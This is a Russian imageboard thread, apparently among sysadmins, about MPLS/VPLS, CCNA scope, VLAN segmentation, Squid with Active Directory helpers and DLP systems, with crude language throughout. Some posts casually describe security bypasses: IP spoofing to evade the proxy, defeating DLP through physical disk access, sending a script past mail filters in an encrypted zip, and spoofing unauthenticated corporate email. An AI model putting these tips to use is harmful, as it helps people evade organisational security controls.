Что-то я последнее время стал зависать на принятии элоементарных решений. Чаю выпить или кофе? Надеть синюю рубашку или серую водолазку? Сейчас выбираю, какой Windows Server 2016 ставить, русский или английский. Прям выбор века, блеадь. Раньше обычно английские ставил. Но тут на работе уже два сервера под виндой есть и оба русскоязычные, как-то не хочется увеличивать зоопарк языков. Зато английский привычнее. Но сейчас на 2000 год, когда у локализованных систем была куча глюков и жмячне было ставить "чистую" английскую. Сейчас они все "чистые".

25 дек, 10:27 244 1155699

>>55695

>тебе не нужно делать маршрутизацию внутри своей сети

То есть оно будет как буд-то единые ВЛАНЫ и тп? Я смогу гнать, условно, VLAN 10 из одного филиала в VLAN 10 в другом филиале, используя транки, и это всё будет работать как локальная сеть?
Но вроде как всякие OpenVPN тоже могут передавать теги вланов.
Ладно, в одном случае инкапсулируется фрейм, а куда, в UDP пакет? или куда его суют? В другом случае сам пакет, так же суётся в другой UDP?

Ответы55707

25 дек, 10:45 245 1155707

>>55699
Да, это будет как единый L2 сегмент - хочешь можешь одни и те же вланы между площадками растягивать.

Куда там что инкапсулируется не знаю, но там всё несколько сложнее. Суть в том, что под каждого клиента заводится свой vrf в него заворачивается клиентский трафик, внутри же сети обычно нет bgp, а используется маршрутизация по меткам LSP, что и является основой MPLS сети при том для каждого клиентского vrf свои тунели строятся, т.к. точки подключения к провайдеру у разных клиентов не совпадают, очевидно. Использование меток позволяет ускорить маршрутизацию и иметь внутри провайдерской сети оборудование без BGP - это дешевле и сама сеть более простая. Ну а vrf-ы позволяют разделить трафик клиентов, чтобы он не пересекался.

Ответы55709

25 дек, 10:49 246 1155709

>>55707

>внутри же сети обычно нет bgp

Оно там есть конечно, но только на пограничных маршрутизаторах.
fix

Ответы55756

25 дек, 12:04 247 1155756

>>55709

>Оно там есть конечно, но только на пограничных маршрутизаторах.

а как же утверджение "BGP is the BESP IGP"?
В ДЦ сетях активно продвигается BGP в качестве внутреннего протокола маршрутизации. Со всеми этими Spine-leaf топологиями

Ответы55870

25 дек, 13:55 248 1155870

>>55756
Ну в spine-leaf ты по-другому и не сможешь организовать масштабирование. Но в провайдерских сетях из многих сотен и тысяч маршрутизаторов держать BGP на каждом из них просто невозможно - там же для iBGP нужно соседство каждого с каждым, ну или конфедерации и роут-рефлекторы внутри них. MPLS для того и придумали, чтобы не использовать BGP внутри сети.

>BGP в качестве внутреннего протокола маршрутизации

Это верно только для транзитных AS в контексте передачи маршрутов в интернет. Раньше была практика их передачи через IGP, но это было ну очень-очень давно. Что до iBGP, то без IGP он как бы всё равно не заработает, так что OSPF или ISIS никто не отменял внутри сети.

Ответы57010

25 дек, 14:01 249 1155878

>>55682

> Двачерсы, поясните мне про L2 VPN, про всякие там VPLS или MPLS и IPoE, вот с L3 VPN уровня point TO point всё ясно, есть сервер, есть клиент, начал читать про VPLS и в ужасе охуел насколько это сложно, сложнее любого BGP.

> Короче, объясните как для пятилетнего, что это как и куда работает, можете подогнать сравнительный анализ, в чём плюсы и тп, вообще расскажите для тупого и с самого начала, где используется в чём плюхи в отличии от L3, я так полагаю, плюхи в том, что удобен при site to site

Ты собрался идти к провайдеру?

Ответы55894

25 дек, 14:13 250 1155894

>>55878

>Ты собрался идти к провайдеру?

Упаси боже хотя хуй его знает, что там в будущем, просто хочу разобраться с сетями на уровне CCNA, ну такой, базовый уровень сетевика чтобы стать шивой, всякие STP, OSPF можно встретить ирл, а вот л2впн с MPLS я не встречал, а ведь интересно

Ответы55911 56044

25 дек, 14:36 251 1155911

>>55894
На уровне CCNA лучше не лезь даже в MPLS и BGP. Всё равно до конца сейчас не разберешься, а где-нибудь на собеседовании какую-нибудь глупость возьмешь да и ляпнешь. Некоторые вещи лучше не знать вообще, чем знать плохо.

Ответы55916 55917

25 дек, 14:50 252 1155916

>>55911

>На уровне CCNA лучше не лезь даже в MPLS и BGP. Всё равно до конца сейчас не разберешься, а где-нибудь на собеседовании какую-нибудь глупость возьмешь да и ляпнешь. Некоторые вещи лучше не знать вообще, чем знать плохо.

Согласен.
Для уровня ЦЦНА лучше усвоить хорошенечно OSPF и разные L2 технологии.
BGP, а уж тем более L2VPN не надо.
L2VPN это вообще узкая провайдерская тема.

25 дек, 14:51 253 1155917

>>55911

>BGP

БГП он же такой, типа не очень, получаешь себе циферку, анонсируешь сеть за собой. ну это актуально как минимум когда у тебя целый пул белых адресов.

Давай тогда так, на каком моменте заканчивается CCNA v3 R&S, так как я уже месяц как изучаю "от забора и до обеда"
А межсетевые экраны туда входят?
Сейчас спустя всякие наты, транки, спанинги дошёл до динамической маршрутизации, ещё надо всякие VRRP поизучать

Ответы55923

25 дек, 14:56 254 1155923

>>55917

>Давай тогда так, на каком моменте заканчивается CCNA v3 R&S

Я не он, но скажу от себя.
Все эти "уровень CC" (вставить нужное) это довольно условное деление.
Тебе твой "уровень CCNA" для чего? Для прохождения собеседований или для сдачи сертификата?
По мне так уровень CCNA должен знать, что такое BGP, как его базово настроить. На этом всё.
Но опять же знать что такое и реально работать с какой-то технологией на крупной сети это разные вещи.

Ответы55926

25 дек, 14:59 255 1155926

>>55923

>Но опять же знать что такое и реально работать с какой-то технологией на крупной сети это разные вещи.

Ясен хуй

А знание всяких там VRRP и прочих протоколов виртуализации оно на каком уровне? Вообще как часто используется, только в ядре и иногда в агрегации?

Ответы55930

25 дек, 15:01 256 1155930

>>55926

>А знание всяких там VRRP и прочих протоколов виртуализации оно на каком уровне? Вообще как часто используется, только в ядре и иногда в агрегации?

VRRP — Агрегация/ядро.

Ответы55934

25 дек, 15:09 257 1155934

>>55930
то есть для успешной работы и уровня ССНА мне достаточно уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки, назначать вланы в том числе и нативные, включать маршрутизацию на L3 коммутаторах, делать маршрутизацию на роутере, OSPF, ACL нууууу ииииии вроде всё

А не слишком ли мало? Как бы тут изучения на пару недель-месяц, учитывая, если знаешь OSI /TCPip

Ответы55944 55962 55963

25 дек, 15:26 258 1155944

>>55934
CCNA - это на самом деле уровень первой линии техподдержки или инженера-монтажника сетевого оборудования в обязанности которого входит прописывание адресов на интерфейсах и т.п. ерунда, чтобы большие админы вообще не отрывали своих задниц в центральном офисе. Что именно входит в обязанности сильно зависит от профиля компании и от ее внутренних айти процессов.

Ответы55949

25 дек, 15:39 259 1155949

>>55944
Так почему таким петухам ещё и платят по 100к? Как-то странно всё это.

Ответы55965

25 дек, 15:52 260 1155962

>>55934

>то есть для успешной работы и уровня ССНА мне достаточно уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки, назначать вланы в том числе и нативные, включать маршрутизацию на L3 коммутаторах, делать маршрутизацию на роутере, OSPF, ACL нууууу ииииии вроде всё

Ну тут понимаешь ли как...это все равно, что написать что-то вроде:
"то есть для успешного ведения войны мне надо научится стрелять, читать карты, расставлять красные флажки в местах расположения армий, отдавать приказы по телефону...ну и врожде всё. А не мало? Всё это можно за неделю изучить.

Ответы55972 55995

25 дек, 15:53 261 1155963

>>55934
главное понимать как это всё работает в учловиях большой сети. И зачем. И видеть когда надо использовать то, а когда это. Это только с опытом приходит.

Ответы55972 55995

25 дек, 15:54 262 1155965

>>55949

>Так почему таким петухам ещё и платят по 100к? Как-то странно всё это.

Потому что работа сетевиком это не "уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки..."
Это инструмент всего-лишь.

Ответы55972 55995

97 Кб, 807x635

25 дек, 16:17 263 1155972

>>55962
>>55963
>>55965
Ладно, вам не бомбите, чего бомбить-то

73 Кб, 1070x848

25 дек, 16:54 264 1155995

>>55965
>>55963
>>55962
Вот вы разошлись, вообще всю вашу работу довольно легко описать в паре страниц:
дели на вланы по отделам, если это влан для телефонов, то делай LACP (если ты ебанутый и купил цисок по 150$ за трубку, вместо фанвилов или елиноков по 50), если для видекамер, то запрещай в АЦЛ
Мути линки от доступа до агрегации через порт-ченнел
от агрегации до ядра по порт-ченнел+стп, ядро так вообще чисто СТП+ченнел, с вррп
всё это в стек рутереров, если один двинет коней, динамическую маршрутизацию внутри по OSPF, по BGP резервный провайдер, VPN на IPsec хотя он сосёт у openvpn а дальше крути-верти обмануть хоти
АЦЛ на запрет лишних портов не забудь повесить на рутер/фаерволл, а да, и всех пиздюков пользователей гони на прокси, а на АЦЛ шли нахуй весь трафик не с прокси

По оборудованию: на доступа ставим самое говно, где надо можно и не управляемое, или управляемое, типа HP 1910, ну или цисок 2960, на всякие там агрегации 3560, на ядерный можно их же, в виде NAT-a минимум 2911, ну для лохов конечно и/или филиалов, плюс пары VPN каналов, с эниконнектом, а на деле ASA, а ну и да, ДМЗ ещё не забудь нахуячить, только там реверс ещё нужен, но вы то реверс не настраивали, ладно, хуй с ним берём haproxy или squid, это можно и на L3 коммутаторе сделать отделив их от всей сети, в АЦЛ, а трафик из того влана deny нахуй, что бы обратно могли ходить только под себя

Короче, всё говно, что не моча

Ответы56005 56223 56260

25 дек, 17:03 265 1156005

>>55995
Ты описал то чем занимается средний сотрудник интегратора.

Ответы56007 56261

25 дек, 17:05 266 1156007

>>56005
Знаю, знаю, на элиту я не могу замахиваться, просто про рядого пиздюка

25 дек, 17:49 267 1156044

>>55894
Тогда забей на все эти mpls/vpls. Нужны только у провайдера для предоставления услуг vpn.

26 дек, 01:14 268 1156221

>>55667

>Зачем тебе вообще здесь две зоны оспф?

Затем, что на граничных маршрутизаторах настроены также туннельные интерфейсы DMVPN с n-ным количеством сетей удалённых площадок, у каждой своя зона. Кроме того не хочется, чтобы в магистраль анонсировалась информация о линках в каждую подсеть LAN ЦО, за исключением summary. А также не хочется, чтобы в тупиковые зоны анонсилась информация о служебных и туннельных линках.

>Разрулить ситуацию можно либо с помощью...

А вот за это спасибо.
>>55310
Тебе тоже спасибо за наводку.

26 дек, 01:14 269 1156222

>>55310 -> >>55670
Промахнулся.

26 дек, 01:16 270 1156223

>>55995

>дели на вланы по отделам

Никогда не понимал, зачем нужно это делать. Каждому отделу своя подсеть. Вообще охуеть.

Ответы56249 56278

26 дек, 05:19 271 1156233

>>55310
Один раз жируху встречал, напаре с хикканом работала.

Ответы56962

26 дек, 07:27 272 1156249

>>56223

> >дели на вланы по отделам

> Никогда не понимал, зачем нужно это делать. Каждому отделу своя подсеть. Вообще охуеть.

У нас зачем то настояли безопасники на этом. Тоже не понятно зачем.

Ответы56278

26 дек, 08:12 273 1156260

>>55995

>Вот вы разошлись, вообще всю вашу работу довольно легко описать в паре страниц:

а чью работу нельзя описать в паре страниц?

Ответы56278

26 дек, 08:13 274 1156261

>>56005

>Ты описал то чем занимается средний сотрудник интегратора.

интегратора? он же вроде описал классического энтерпрайз-сетевика.

26 дек, 08:14 275 1156262

Какой то попадос аноны, но учу джаву будучи недоадмином, для мониторинга говна. Кто с jmx говном сталкивался?

26 дек, 09:13 276 1156278

>>56223

>Никогда не понимал, зачем нужно это делать. Каждому отделу своя подсеть. Вообще охуеть.

>>56249

>У нас зачем то настояли безопасники на этом. Тоже не понятно зачем.

Чтобы была возможность кого-то быстро пидорнуть при необходимости, продампать, проспуфить, найти откуда ноги растут. Чем больше широковещательных доменов, тем меньше широковещательных пакетов в сети, я бы вообще настаивал, что бы между подсетями закрыли все порты кроме используемых, ибо нехуй им иметь allow ip from any to any с 1 по 65535, выделил необходимое, остальное на прокси

На хабраче же есть вагон статей как спуфить трафик
https://habrahabr.ru/post/226679/

Я плохо помню всякие PCI DSS и ISO 27000, так как читал их сто лет назад, но вангую, что там тоже было деление

Вообще в огромных корп сетях деление, конечно, идёт по филиалам, допустим 10.10.56.0/22 с делением на 24 макси на ЦО, а всякие 172.16.100.0/16 с маской 24 на филиалы

Но, конечно, надо резать все пакеты в сети от DHCP, которые не DHCP и тому подобному

>>56260
У Шивы! Поэтому я буду Шивой

Ответы56322

26 дек, 10:54 277 1156322

>>56278

>У Шивы! Поэтому я буду Шивой

Не, шива это обо всём и ни о чём. Знает всё по чуть-чуть. И стулья чинить, и чайники, и серваки админить, и мебель перетаскивать. Нахуй-нахуй

Ответы56350

26 дек, 12:07 278 1156350

>>56322
Почему, нормально, когда ты можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия, это очень странно, что многие упоротые специалисты не хотят выходить за рамки своего кругозора, мотивируя тем, что "ко-ко я лучше буду одно знать нормально, чем два, но плохо". Можно знать хорошо и две области.
А постоянно говорить, что это не по канону, просто отговорки.
У меня есть друг недотянувший 10 баллов на CCNP, когда я его спрашиваю на чём DNS и DHCP будешь делать он с твёрдой уверенностью говорит, что только на циске, вообще не понимая как работает авторизация в домене шиндоус, и для чего он нужен.
С другой стороны есть Я - ИБшник, обоссаный, сраный ИТ ИБшник, сукаблятьненавижуэтуработуброшуеёнахуй.
Так вот, сейчас есть интересная задача - реализовать выход одного приложения в сеть минуая ASA и PROXY, но так, что бы остальные приложения не ходили, приложение использует около 10к TCP и UDP портов и бешенного количество удалённых хостов с динамическими доменами 2-3-4 уровня, открытие на ASA которых приведёт к пидорству в сети уровня торрентов, и прочиего говна, которое людям не положено.
Как ИБшник я вообще нахуй шлю с такими программами, но есть запасное решение, ага, требующее знание двух областей, на случай если потребуется реализация от верховного главнокомандующего:
1. маркируем трафик конкретного приложения через ГПО, например, по TOS
2. Выпускаем на ASA по TOS-у

И таких примеров довольно много
Например задача: реализовать фильтрацию контента от плохих сайтов:
решение какое предложит любой вендор:
блюкот аса, цена внедрения, сколько там, в районе 20к долларов, или около того
Решение для "шарящего":
1. ставим SQUID + Rejik, режик не умеет в авторизацию в АД, но он охуенно лёгкий, горяздо легче сквид гварда, режим по базам режика доступ к ресурсам
2. выгружаем раз в 10-20 минут пользователей из группы кому-что можно, кому нельзя через Get-ADGroupMember "Terpili bez interneta" | Select SamAccountName > ACL.txt, подгружаешь в режик и смотришь
3. более секьюрный, но лень писать запрос, что пиздец как, через линух выгрузить пользователей домена и занести в файл, можно через тот же хелпер сквида

К чему я это, к тому, что ты должен разбираться до определённого уровня во всех областях, и только потом уходить в какую-то конкретную

26 дек, 12:07 278 1156350

Ответы56357 56361 56363 56369

26 дек, 12:12 279 1156357

>>56350
Ну у сквида есть минусы, терпилы без интернета могут стать с интернетом

Ответы56358

26 дек, 12:13 280 1156358

>>56357
Ну давай, расскажи-ка мне как

Ответы56373

26 дек, 12:14 281 1156361

>>56350

>когда ты можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия

Серверную и сетевую инфру небольшого предпрятия и я могу.
Надо большого! С развитой сетью филиалов, СХД, виртуализацией и несколькими ДЦ.

Ответы56369 56391

26 дек, 12:16 282 1156363

>>56350

>через линух выгрузить пользователей домена и занести в файл

Будем честны - лучше заплатить 20к зелени за готовое решение, чем так страдать. Олсо если у тебя в AD не 100-2000 учеток, а, скажем, в компании человек 30000+ даже мысли о подобных костылях уже выглядят смешно.

>ИБшник

ИМХО, безопасник - это такая белая шляпа, которая зарабатывает на баунти программах по поиску уязвимостей, а то чем ты занимаешься - обычная внутри корпоративная суета сует и томление духа. И беда вся в том, что ни предотвратить, ни отразить целенаправленную атаку на свою компанию, ты вряд-ли сможешь...

Ответы56367 56391

26 дек, 12:18 283 1156367

>>56363

>баунти программах по поиску уязвимостей

это ещё что за херня?

Ответы56370

26 дек, 12:18 284 1156369

>>56361
>>56350

>можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия

Только вот ни в одну составляющую инфры большого предприятия такой "специалист" уже не сможет и это печально, т.к. сильно ограничивает развитие и карьерный рост. Переходить к новой отрасли имеет смысл либо когда достиг предела в своей, либо если она находится где-то на стыке и ее освоение реально умножит твою ценностью, как специалиста.

Ответы56391

26 дек, 12:19 285 1156370

>>56367
Надеюсь, это не тот безопасник, что выше отписался, спрашивает?!
https://ru.wikipedia.org/wiki/Bug_Bounty

Ответы56371 56374

26 дек, 12:20 286 1156371

>>56370

>Надеюсь, это не тот безопасник, что выше отписался, спрашивает?!

Не, я не он, я сетевик

Ответы56381

26 дек, 12:21 287 1156373

>>56358
Если кто-то имеет полный доступ у сквида или выше выданных тебя, можно просто подделать, по умолчанию люди делают что у 99% без ограничений идет у сервера прокси и просто подделываем запросы, прикидываемся что у нас ойпи как у сервера. По умолчанию, программ долбящих сквид вагон тот же проксифаер

26 дек, 12:22 288 1156374

>>56370
прочитал что такое баг баунти.
ИМХО безопасник в российский реалиях это тот, кто пишет всякие бумажки и внедряет решения для того, чтобы закрыть жопу предприятия перед всмякими контролирующими органами.
В довесок к этому следит, чтобы сотрудники не спиздили базху данных клиентов.

Ответы56376 56381

26 дек, 12:24 289 1156376

>>56374

>чтобы сотрудники не спиздили базху данных клиентов

Это как в привате? Извините, не удержался.

Ответы56379

26 дек, 12:25 290 1156379

>>56376

>Это как в привате? Извините, не удержался.

в каком ещё привате. Не понимаю тебя.
ПриватБанк что ли хохлятский имеешь ввиду?

Ответы56385

26 дек, 12:26 291 1156381

>>56371
Вообще эта тема весьма прибыльная, если ты реально шаришь в безопасности, а не просто хуй из отдела безопасности очередного средне-энтерпрайза. Регаешь на https://www.hackerone.com и получаешь по 100-300 баксов даже за весьма тривиальные уязвимости. Есть целые гайды для новичков: https://krober.biz/wp-content/uploads/2017/03/web-hacking-101.pdf - сам я не из этой области, но немного почитал эту книжку, т.к. сейчас небольшой сайт внутри компании задеплоил...

>>56374
Ну от квалифицированного хакера ВНУТРИ компании (особенно внутри отдела IT или безопасников), увы, защититься нельзя. Спасает только одно - никто не пойдет на такой риск, т.к. вознаграждение в случае успеха недостаточно высоко по сравнению с наказанием в случае провала.

26 дек, 12:27 292 1156382

1с-ник и безопасник ссут в уши гендиру

У нас всё секурно!
@
vpn - скомпроментированный pptp
@
база 1с в которой все всё в первый день распечатывают список клиентов и получают пизды(если увидят)

Ответы56392

26 дек, 12:30 293 1156385

>>56379
https://ebanoe.it/2017/12/01/privatbank-hacked/

26 дек, 12:36 294 1156391

>>56361

>Надо большого! С развитой сетью филиалов, СХД, виртуализацией и несколькими ДЦ.

Ты пишешь как буд-то это что-то страшное, и никогда не настраивал.
У меня был знакомый, который занимался виртуализацией, ещё в институте, такая пшука вообще, он рассказывал, о "гениальном решении", когда их серверу понадобилось больше 500гб ОЗУ, а денег не было, они сделали страйп из двух ССД и поместили на него ОЗУ той виртуалки, просто пушка, ну охуеть, выдумщик, а на деле даже адресацию в сетях не понимал, это всё херня, так же как и резервный ЦОД, впн уровня поинт ту поинт, скорее всего, почему-то я вангую, что 70% здесь сидящих сетевиков не расскажут о том как работает IPsec, а вопрос то прикладной в их области

>>56363

>Будем честны - лучше заплатить 20к зелени за готовое решение, чем так страдать. Олсо если у тебя в AD не 100-2000 учеток, а, скажем, в компании человек 30000+ даже мысли о подобных костылях уже выглядят смешно.

Да, готовое решение всегда лучше, но с ограниченным бюджетом, бесплатное не сильно и хуже, разве, что ГУИ нет, и иногда ошибки на ССЛ бамп, от которого можно вообще отказаться и делать только пики степ1, если у тебя нету ДЛП
Костыль - решение для режика, так как он не умеет в АД, а на сам сквид нету блеклистов, точнее есть, но оно совсем не подходит под наш регион, плюс сквид, если ты не знаешь, с версии, кажется 3.4 перестал понимать такие ACL, где содержится домен первого и домен второго уровня, он выдаёт ошибку, типа или блокируй первого уровня или второго, а два сразу нельзя. Из-за этого используют редиректоры.
Сам squid умеет авторизоваться в АД, как я и написал, можно через хелпер сквида брать пользователей для редиректора

>ИМХО, безопасник - это такая белая шляпа, которая зарабатывает на баунти программах по поиску уязвимостей, а то чем ты занимаешься - обычная внутри корпоративная суета сует и томление духа. И беда вся в том, что ни предотвратить, ни отразить целенаправленную атаку на свою компанию, ты вряд-ли сможешь...

Это не верное представление, безопасник - обратное от хацкера, ты должен уметь хацкать, что бы предотвратить, ну я про ИТ безопасника, но моя работа говно, и я уволюсь

Кстати, я ИБшник в конторе с 10к пользователями и 6к рабочими станциями, я тебе больше скажу, несмотря на размеры, мы не ГОС, денег на ИТ выделяется крайне мало, поэтому и рождаются такие костыли

Кстати, в своё время был админом в одном из банков, так и там была связка блюкота с сквидом, ага, ага, из экономии, мань

>>56369
Суть в том, что бы в крупной конторе уметь давать рекомендации. Если подрядчик наделал хуйню, а ты не компетентен это проверить, то это - твоя проблема
Не надо быть админом всего, надо уметь это делать, и понимать где кто-то может обосраться. И это важно ещё для того, что бы другие отделы или подрядчики тебе не вешали лапшу на уши по поводу сложности задачи
Живой пример: подрядчик предлагает сделать шифрование каналов между нодами готового решения, цена вопроса 200к, решение - 3 команды из openssl, которые он мог бы ввести сам за 200к, или, которые ввёл я, сэкономив деньги компании, получив приятный бонус в конце квартала

Вопросы?

26 дек, 12:36 294 1156391

>>56361

>Надо большого! С развитой сетью филиалов, СХД, виртуализацией и несколькими ДЦ.

>Будем честны - лучше заплатить 20к зелени за готовое решение, чем так страдать. Олсо если у тебя в AD не 100-2000 учеток, а, скажем, в компании человек 30000+ даже мысли о подобных костылях уже выглядят смешно.

>ИМХО, безопасник - это такая белая шляпа, которая зарабатывает на баунти программах по поиску уязвимостей, а то чем ты занимаешься - обычная внутри корпоративная суета сует и томление духа. И беда вся в том, что ни предотвратить, ни отразить целенаправленную атаку на свою компанию, ты вряд-ли сможешь...

Ответы56400

26 дек, 12:38 295 1156392

>>56382
БЕЗОПАСНИК УХОДИТ ПИТЬ ЧАЙ
@
СЕТЕВИКИ ВКЛЮЧАЮТ НА ФАЕРВОЛЛЕ ПРАВИЛО ALLOW ANY TO ANY
@
ВИНДУЗЯТНИКИ ДОБАВЛЯЮТ ВСЕХ В ДОМЕННОГО АДМИНА
@
ЛИНУКСОЙДЫ ВКЛЮЧАЮТ АВТОРИЗАЦИЮ ОТ ROOT С ПАРОЛЕМ ROOT
@
ЭНИКЕИ УДАЛЯЮТ АНТИВИРУСЫ
@
БУХГАЛТЕРА НАМАТЫВАЮТСЯ НА АМИГО
@
МЕНЕДЖЕРЫ СКАЧИВАЮТ ДЕТСКОЕПОРНО.EXE
@
СЕКРЕТАРИ ЗАСОВЫВАЮТ ФЛЕШКИ ВСЕХ ПРИХОДЯЩИХ ЛЮДЕЙ В КОМПУХТЕР
@
ПАРОЛЬ ОТ SQL ТЕПЕРЬ "*"

26 дек, 12:47 296 1156400

>>56391

>ты должен уметь хацкать

Я таких безопасников еще нигде не встречал. Что логично, ведь если ты рили можешь хакать, то на копеечном окладе в черте-какой компании сидеть не будешь.

>squid умеет авторизоваться в АД

Ну мы так сейчас доебемся до того, чтобы сами весь нужным нам функционал на пайтоне написать с нуля. То же взаимодействие с AD я, например, уже делал неоднократно, правда это было на java, но суть та же. Кто вот только потом сможет такие решения поддерживать, после увольнения изобретательного админа?

Ответы56405 56411

26 дек, 12:54 297 1156405

>>56400
Давайти проведем черту, АД это не единая технология и взаимодействие ты проводил через керберос?

Ответы56406 56412

26 дек, 12:56 298 1156406

>>56405
При чем тут керберос то? Задача вроде была получить пользователей, а заодно еще и привязку имени пользователя к имени компа и IP. Иначе нахуй вообще с AD взаимодействовать?

Ответы56409 56412

26 дек, 12:58 299 1156409

>>56406

>То же взаимодействие с AD я, например, уже делал неоднократно,

Ответы56410

26 дек, 13:00 300 1156410

>>56409
Через openldap интерфейс.

26 дек, 13:01 301 1156411

>>56400

>Я таких безопасников еще нигде не встречал. Что логично, ведь если ты рили можешь хакать, то на копеечном окладе в черте-какой компании сидеть не будешь.

У меня не копеечный оклад, и я не в хуле какой, а известной по всей РФ конторе, просто работа говно, мне нужна или абсолютная власть или веселье, а тут я 90% времени ебалом в длп, хуйня полная
Ну надо понимать, что 100% защиты от атак не бывает, например, когда 2 года назад нашли уязвимость в цисках, ей воспользовались злоумышленники, и хацкнули один банк, где работал мой друг, с выводом средств, и это была вина ЦИСКО, поскольку у банка был пройден PCI DSS, и соблюдены все меры
Равно как и нельзя защититься от спуфинга в подсетях, так как хацкер может прийти и засунуть устройство в патчкорд между ПК и сетевухой, ну варианты

У сквида есть хелперы, зачем что-то писать на питоне, они есть из коробки

auth_param negotiate program /usr/lib/squid3/negotiate_wrapper_auth --ntlm /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp --kerberos /usr/lib/squid3/negotiate_kerberos_auth -s HTTP/pro~NJxyANUSdTT4omainPUNCTUMloc%42al

Просто авторизуй линуксовый сервак через самбу и крб в домен, получи тикет и делай дальше запросы

или вот:
external_acl_type memberof ttl=3600 ipv4 %LOGIN /usr/lib/squid3/ext_ldap_group_acl -v 3 -P -R -K -b "dc=company,dc=local" -D srv9)'-ldapANUScomphbzanyPUNCTUMlocaWVml -W /etc/squid/PASSWORDS/conf_param_ldappass.txt -f "(&(objectclass=person)(sAMAccountName=%v)(memberOf:1.2.840.113556.1.4.1941:=cn=%g,OU=SQUID,OU=SECURITY,DC=int,DC=rolfcorp,DC=ru))" -h dc-01.company.local company.local

Это запрос смотретьна группы с подгруппами, можно и бейсик запрос, но в явном виде - не безопасно

И саму группу авторизуешь как acl в сквиде:

acl InternetFull external memberof InternetFull

26 дек, 13:04 302 1156412

>>56406
нет,

>>56405 - это другой анон, но он прав, про керберос

squid - умеет работать с AD, умеет авторизоваться, умеет смотреть пользователей, и работать с группами и подгруппами, конфиг для примера выше

rejik или squidGuard - доп софт, который ставится в связке с сквидом, он НЕ умеет работать с АД

Если ты ограничиваешь трафик по написанным или найденным тобой блек-листам через сквид, то проблем нету

Если ты для удобства берёшь готовые блек листы с миллионами сайтов по категориям, например шелладб http://www.shallalist.de/ , то это говно с сквидом без сквидГварда не работает
Отсюда и появляются такие костыли

Если у тебя стоят правила, уровня: можно только 5-50 сайтов, остальное нельзя или фулл, тогда обычный сквид без надстроек и всё, этого более чем

Ответы56415

26 дек, 13:06 303 1156415

>>56412
ОК, понял. Просто у нас была TMG, а сейчас перешли на PaloAlto... Сквид вообще в глаза не видел.

Ответы56431

26 дек, 13:23 304 1156431

>>56415

>Сквид вообще в глаза не видел.

ну пиздец блять, ну пиздец, ну сука, ну пиздец, вот с этого я прямо подгорел, ну ты и блять пиздец

> ругает

> не пробовал

ну блять, ну и нахуй

У TMG нету ICAP, у нас актуально для DLP в разрезе наличие ICAP

И вообще зря, сквид очень крут, ты думаешь, почему в 90% случаев или бесплатный сквид или платный блюкот, потому, что остальное - мусор
Плюс у сквида просто божественное масштабирование, в буквальном смысле скопировал машину с сквидом - вторая прокси, ещё раз - третья, и всё, только переименуй и готово

А, ну и последнее, я тебе рассказал только про сквидГвард, а у сквида сотни плагинов и доп фич, анализатор логов - кто куда ходил, пожалуйста - sarg/lightsquid, посмотреть активные соединения - sqstat
Хочешь - делай в коннект, хочешь в транспарент, хочешь задавай формат логов, хочешь исключай из логов, балансируй трафик, делай реверс, фильтруй по контенту (музыка, фото, видео), работа с регулярными выражениями
Короче, сквид в буквальном смысле умеет всё, только имеет проблему с плохо подписанными сайтами, так как базируется на сертификатах мозиллы

Ответы56530 56556

26 дек, 13:42 305 1156530

>>56431

>вот с этого я прямо подгорел

Ну так я совсем и не безопасник, лол.

>DLP ICAP

Как одно с другим вообще связано? Никакой DLP не помешает подключить жесткий диск рабочего компа к мобильному телефону через sata-usb переходник и внешний источник питания. Или вы шифруете диски всех пользователей? А ICAP - это, вроде, совсем из другой оперы, про перенаправление проксируемого трафика для проверки на вирусы.

Ответы56563

26 дек, 13:48 306 1156556

>>56431
Замену TMG уже нашел?

Ответы56580

26 дек, 13:49 307 1156563

>>56530
Ты не работал с DLP

DLP, например симантек, на котором я сижу, имеет модули: эндпоинт (ставится на конечные точки, встраивается в браузеры, в драйвера USB и всего всего) Network (отправляют трафик с прокси сервера на проверку, да, да ССЛ, про сслбумп я тебе писать не буду гугли сам), модуль распознования картинок (забыл название, но как-то так) и модуль сетевых шар, который маркирует все файлы на шарах

Вот эндпоинт ставится, как я писал выше в разрез всего I/O твоей системы, от флешек, до клавиатуры и принтеров
Единственный вариант - фоткать монитор

Сириусл, а политики опознавания телефонов задаются регулярными выражениями. Пример:

((\+?\s?[7])|8\s?)?[-\ ]?[(]?(([9][01235689][0-9]|(49[5689])|(8[18][123])|800))[)]?[-\ ]?\d{3}[-\ ]?\d{2}[-\ ]?\d{2}

слушай, поговорил с тобой, и таки думаю, что надо бы мне работу менять, вроде не очень-то я и тупой, а то постоянно кажется что знаний на нормальное место не хватит :((((

Ответы56580

26 дек, 14:09 308 1156580

>>56556
А чем PaloAlto не замена? NGFW как-никак, плюс по подписке базы для фильтрации плохих сайтов, сетевых сервисов и проверки трафика на вирусную, ну и своя собственная песочница в придачу. Всё было бы совсем хорошо, если бы это дело настраивали не наши безопасники, а знающие люди, лол.

>>56563

>SSL BUMP

Ну пальто тоже это умеет, разумеется, если есть возможность подменить пользовательский сертификат всем сотрудникам (нельзя, потому что у топчиков личные маки / айфоны, которые должны работать в корпоративной беспроводной среде на всех площадках).

>DLP

У обычных пользаков семерка с секретнетом - вот и всё DLP. Про то, что проверки секретнет отключаются локально при наличии локальных админских прав, ты и так знаешь, равно как и что получение этих прав предотвратить невозможно при физическом доступе к компу. А про то, что у этих пользаков нет никакой чувствительной инфы (в отличие от топчиков) я молчу.

>фоткать монитор

Ну это если данные вообще не сохраняются локально на компе, а если сохраняются - выкручивай его, да копируй до посинения.

Интересно, кстати, как почтовый сервер у вас обрабатывает вложения с зашифрованными архивами и всякие rarjpeg-и... У нас - никак, на днях коллеге ps1 скрипт в шифрованном zip-е успешно отправил... Да чего там, можно было даже письма без авторизации отправлять(!) пока я не заметил и не рассказал. Мне не верили, пока не прислал письмо с чужой корпоративной почты. Такие вот реалии безопасности. И я рад, что не отвечаю за нее никаким образом.

У тебя синдром самозванца - ты явно разбираешься в своей области, не бойся нихуя и ищи работу себе по душе.

Ответы56588

26 дек, 14:25 309 1156588

>>56580

